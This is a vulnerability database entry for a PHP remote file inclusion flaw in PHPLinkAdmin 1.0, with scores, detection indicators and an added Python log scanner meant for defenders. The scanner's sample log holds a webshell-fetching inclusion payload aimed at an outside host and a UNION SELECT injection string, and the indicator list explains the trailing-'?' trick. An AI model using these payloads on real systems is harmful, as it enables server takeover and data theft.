CVE-2009-1025
Published 2009-03-20
Priority: P3 · 55 · high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 29.83% (98.0th percentile)
PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beerwin | phplinkadmin | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests to linkadmin.php where the 'page' parameter contains an external URL (http:// or https://), indicating a Remote File Inclusion attempt.
- The RFI payload appends a trailing '?' to the remote URL to nullify any local file extension appended by the include statement; detect this pattern in the 'page' parameter value.
- The vulnerable include is triggered without authentication ('Direct acces to linkadmin.No auth.'); alert on any unauthenticated access to linkadmin.php with a non-empty 'page' parameter.
- Detect SQL injection attempts against edlink.php via the 'linkid' parameter, specifically payloads using UNION SELECT with concat_ws to extract user(), database(), and version().
- The r57 webshell (r57.txt) is the payload delivered via RFI; presence of r57.txt or r57.php on the filesystem or in web logs is a strong indicator of compromise.
- The vulnerable code uses $_REQUEST['page'] with no sanitization or authentication check, meaning the RFI is exploitable by any unauthenticated remote attacker.
- The SQL injection in edlink.php also uses $_REQUEST['linkid'] with no sanitization, making it exploitable without authentication as well.
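The indicators above can be turned directly into a log-side detector. The following is an added example (not part of this CVE record, the cited sources, or the PHPLinkAdmin code): it parses combined-format web access log lines, which are constructed here for the example, and flags the patterns listed in the Detection & IOCs section, namely an external URL in the 'page' parameter of linkadmin.php, the trailing '?' trick, a non-empty 'page' parameter on linkadmin.php (low confidence, since an access log does not show authentication state), UNION SELECT in the 'linkid' parameter of edlink.php, and any reference to r57.txt or r57.php. The log format, IP addresses and indicator names are assumptions made for the example.

```python
"""Detector for the PHPLinkAdmin RFI / SQLi indicators (added example, not project code).

Assumptions: Apache/nginx combined log format; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic). Line 1 is the RFI pattern
# with the trailing '?', line 3 the SQLi pattern, line 5 a probe for the webshell name.
SAMPLE_LOG = """\
198.51.100.7 - - [20/Mar/2009:10:01:02 +0000] "GET /linkadmin.php?page=http://203.0.113.9/r57.txt? HTTP/1.1" 200 512 "-" "curl/7.19"
198.51.100.8 - - [20/Mar/2009:10:02:10 +0000] "GET /linkadmin.php?page=links HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Mar/2009:10:03:44 +0000] "GET /edlink.php?linkid=1%20UNION%20SELECT%20concat_ws(0x3a,user(),database(),version()) HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.10 - - [20/Mar/2009:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.11 - - [20/Mar/2009:10:05:00 +0000] "GET /r57.php HTTP/1.1" 404 200 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target protocol", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
EXTERNAL_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)   # remote include source
UNION_SELECT_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE | re.DOTALL)
R57_RE = re.compile(r'r57\.(txt|php)', re.IGNORECASE)              # webshell file name


def analyze_line(line):
    """Return a list of (indicator, detail) tuples for one access-log line; [] if nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; ignore rather than raise
    target = m.group('target')
    parts = urlsplit(target)                       # splits path from query string
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []

    if path.endswith('/linkadmin.php'):
        for value in params.get('page', []):
            if EXTERNAL_URL_RE.match(value):
                findings.append(('rfi_external_url', value))
                if value.endswith('?'):
                    # trailing '?' turns any appended extension into a query string
                    findings.append(('rfi_trailing_question_mark', value))
            elif value:
                # Access logs do not show auth state, so a plain non-empty 'page'
                # is only a low-confidence indicator; correlate with session data.
                findings.append(('linkadmin_page_param', value))

    if path.endswith('/edlink.php'):
        for value in params.get('linkid', []):
            if UNION_SELECT_RE.search(value):
                findings.append(('sqli_union_select', value))

    if R57_RE.search(target):
        findings.append(('r57_webshell_reference', target))

    return findings


def scan_log(text):
    """Run analyze_line over every line; return {line_number: findings} for lines with hits."""
    results = {}
    for number, line in enumerate(text.splitlines(), 1):
        findings = analyze_line(line)
        if findings:
            results[number] = findings
    return results


if __name__ == '__main__':
    for number, findings in scan_log(SAMPLE_LOG).items():
        for indicator, detail in findings:
            print(f'line {number}: {indicator}: {detail}')
```

Feed a real log through `scan_log` (or `analyze_line` per line) and route `rfi_external_url`, `sqli_union_select` and `r57_webshell_reference` hits straight to an alert; treat `linkadmin_page_param` as context to join with authentication or session logs, since the access log alone cannot tell an authenticated administrator from an anonymous request.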
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/52779
- http://secunia.com/advisories/34323
- http://www.securityfocus.com/bid/34129
- http://www.vupen.com/english/advisories/2009/0733
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49265
- https://www.exploit-db.com/exploits/8216